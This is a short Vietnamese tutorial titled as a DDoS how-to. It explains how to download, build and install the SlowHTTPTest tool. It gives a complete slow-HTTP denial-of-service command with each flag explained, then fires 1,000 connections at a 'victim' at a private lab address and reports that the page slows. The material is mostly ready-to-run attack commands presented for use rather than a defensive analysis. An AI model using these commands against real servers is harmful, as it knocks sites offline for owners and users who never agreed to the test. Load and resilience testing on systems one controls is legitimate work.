DDOS bằng SlowHTTPTest


Trước tiên tải về SlowHTTPTest bằng câu lệnh
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz
Xả nén
tar -zxvf slowhttptest-1.4.tar.gz
Cài đặt
cd slowhttptest-1.4
./configure
make
make install
Để sử dụng SlowHTTPTest, chúng ta sử dụng câu lệnh
slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
Giải thích câu lệnh trên
-c Số lượng các kết nối, theo pr của tác giả SlowHTTPTest thì phiên bản 1.4 này có thể tạo tới 64000 kết nối

-H, B,  Xác định chúng ta sẽ sử dụng phần gọi là “slow down” trong header hay trong body của gói tin

-g  Sinh output dạng csv, xml, html

-i  Thời gian giữa 2 connection

-o  Định ra đường dẫn, tên file, nếu sử dụng lựa chọn này thì phải có -g

-r  số lượng kết nối trong 1 giây

-s  giá trị byte trong trường  Content-Length, yêu cầu phải có -B trước

-u  target URL

-v  mức độ chi tiết, có các mức từ 0-4

-x  Độ lớn (byte) tối đa của dữ liệu gửi đến
Trước tiên ta thử với 1000 connection tới victim 192.168.0.180
slowhttptest -c 1000 -B -g -o ouput_dos -i 100 -r 300 -s 10240 -u 192.168.0.180 -x 20
Refresh page nào, dữ liệu chậm, nhưng mà vẫn load được: